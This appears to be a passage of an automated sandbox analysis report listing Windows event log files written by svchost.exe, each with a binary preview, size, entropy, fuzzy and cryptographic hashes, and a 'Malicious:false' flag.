      Preview:ElfChnk.....................................p.......[.x......................................................................X..............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.014860518194814
      Encrypted:false
      SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
      MD5:4FB8E2CF8B3F20534836684947962DC2
      SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
      SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
      SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
      Malicious:false
      Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.15655690871689
      Encrypted:false
      SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
      MD5:2DE60575CB719BF51FAB8A63F696B052
      SHA1:BD44E6B92412898F185D5565865FEA3778573578
      SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
      SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
      Malicious:false
      Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):72208
      Entropy (8bit):2.258766810319592
      Encrypted:false
      SSDEEP:384:Aro+oayOoXoay/oeoayyovoayroOoayyhdo69CcoTorNorWorbvorTorZorQorNN:wDCYhVR
      MD5:12D653F930A87811C05B2D6E564A6512
      SHA1:AE5CF32764E39E778D87F1D549DEB066777F1970
      SHA-256:3A56527F03E72B739D94CD7D7CF0CC761DC29D5A428A10FA92F66A24737C8775
      SHA-512:20A9A5A2088ACB8A986F6190DF08C4B723602494B48D7AA8A3F10F5D657F4CB73406DF93C503D4A59F1BF233F261416794BF940CEABA201C476175BE379C95C8
      Malicious:false
      Preview:ElfChnk.........)...............)...........Hb...d....8/.....................................................................h.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/...........$..U)..............................**...... .......MWB................$..............................................................>.......V...7.!..o..............MWB.......&O......'O....0...4... ....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...be.`=/..................l...............K.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.8524226245257144
      Encrypted:false
      SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
      MD5:B8E105CC52B7107E2757421373CBA144
      SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
      SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
      SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
      Malicious:false
      Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.8432997252442703
      Encrypted:false
      SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
      MD5:39EE3557626C7F112A88A4DE12E904C1
      SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
      SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
      SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
      Malicious:false
      Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.995520529521179
      Encrypted:false
      SSDEEP:384:1hqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28I:1bCyhLfIXBS5
      MD5:459777E03F90A66F4B09B6634DDE85CB
      SHA1:06322A62D3FF9F64E3FC753A6D0E2CEB184E7854
      SHA-256:26C2362CD0055CFF9E3CBCCEEE8C8061C7DBD476C37218E356666A694AF55ED3
      SHA-512:0BC513AAF896CFCDDB923F3D573E9C3E1321B361C42AE5AEE86BE65D9DB451853CBDAD00D6F31AA67E58C8B3D07DE88E7990C1DD40942F09202DEB227967084E
      Malicious:false
      Preview:ElfChnk.........H...............H...........@.......m.......................................................................:...................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.838106263184782
      Encrypted:false
      SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
      MD5:A2D41740C1BAF781019F282E37288DDF
      SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
      SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
      SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
      Malicious:false
      Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.634418630947688
      Encrypted:false
      SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
      MD5:A00BAFFCABB00428EA0512FCECCC55E5
      SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
      SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
      SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
      Malicious:false
      Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.0646587531847893
      Encrypted:false
      SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
      MD5:399CAF70AC6E1E0C918905B719A0B3DD
      SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
      SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
      SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
      Malicious:false
      Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.4364303862010575
      Encrypted:false
      SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
      MD5:2BB73ACC8F7419459C4BF931AB85352C
      SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
      SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
      SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
      Malicious:false
      Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.0631557320109892
      Encrypted:false
      SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
      MD5:86AEA3A9CA3E5909FD44812754E52BD6
      SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
      SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
      SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
      Malicious:false
      Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.4467272005363894
      Encrypted:false
      SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
      MD5:155681C222D825199B738E8DEC707DC8
      SHA1:704C800E7313F77A218203554E1428DF2819BC34
      SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
      SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
      Malicious:false
      Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.156155224835584
      Encrypted:false
      SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
      MD5:F22AC858C2ACC96E8F189E43FFE46FBD
      SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
      SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
      SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
      Malicious:false
      Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.9197999988543422
      Encrypted:false
      SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
      MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
      SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
      SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
      SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
      Malicious:false
      Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
      Category:dropped
      Size (bytes):76040
      Entropy (8bit):4.551703952049529
      Encrypted:false
      SSDEEP:768:2LjpPv++M48PFVbUa+53KtLjpPv++M48PFVbUa+53KyY20sMY3Dp13/n/ydIxm6c:LU
      MD5:52B62F9EF6F6A8A8177CC96A362C0C99
      SHA1:840CD0DA9EE506995D762FB377795A33C8702A04
      SHA-256:66FBE53F07500CDFA5A6BA8BC3B9D67AC38F218F30C331003F7BBA89E0C2FA32
      SHA-512:F36CECB4268633349F3C412777361B151CBCD4071D65A684EA1BD96B60CBDF41E601B68142F105662A685995E34B54D6ED16B828AE012D20DE53110ED4D0DF5A
      Malicious:false
      Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...|N?.....................................................................<..................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):75880
      Entropy (8bit):5.703921633878585
      Encrypted:false
      SSDEEP:384:ohAa5a29o2KbzyzIzWa5KzuzNz0zxzuewKWMKJa5ixhAa5a29o2KbzyzIzWa5KzN:oLyxLy0tHoPwFNfb2Ivrbj/
      MD5:F9E383CB1C56137C15837F31D74B0968
      SHA1:3D1D3EA2A6CE78D1D41165972723050859F93D09
      SHA-256:0F410DA8167031C8FFFCAB932A7AD51618F60536A54EBEC40133F120D6F1154C
      SHA-512:91C38D39CF23A4C0B8BD6BBBC9F5E2F612255F4085A777E74649DDA22AD8EFEE5D94C056001EAA6AA331078BA536BBB2BCC0600509C60D61D5911277BF25ADEC
      Malicious:false
      Preview:ElfChnk.A.......C.......A.......C............$..h(....B......................................................................o.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................%..........**......A........+................&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.9963080376858662
      Encrypted:false
      SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
      MD5:A51AFE78FA4481FA05EDC1133C92B1D8
      SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
      SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
      SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
      Malicious:false
      Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):4.076996627399968
      Encrypted:false
      SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
      MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
      SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
      SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
      SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
      Malicious:false
      Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):3.2250891068934284
      Encrypted:false
      SSDEEP:384:AhhDIEQAGxIHIFIWInIfEITQIAIQIfID8IaxIcI8IfRITGIHUI6IwI2IVIWIfRG+:AhZxGp979
      MD5:81594443804852FF3B0ED97DCAD23086
      SHA1:89461C72D1BDF0DD0C33D39AA19AFE71F4560DDD
      SHA-256:6D6746BA193BE6707972B29F81E6C7490116A6380B1648069B6767279C18ADD2
      SHA-512:00617059A06DA3B67D81C1816AA8595B7EF5FF74AAE01BFB6878FAB2C2F7195078476F2D9E06F0C6E4F5429D6B865984D88888220CDD218C3981512DB34F2F6C
      Malicious:false
      Preview:ElfChnk.T...............T...................x...h...>.........................................................................)........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):0.801423310886069
      Encrypted:false
      SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
      MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
      SHA1:542608204AF6B709B06807E9466F7543C0F08818
      SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
      SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
      Malicious:false
      Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
      Process:C:\Windows\System32\svchost.exe
      File Type:data
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):2.996272372482282
      Encrypted:false
      SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
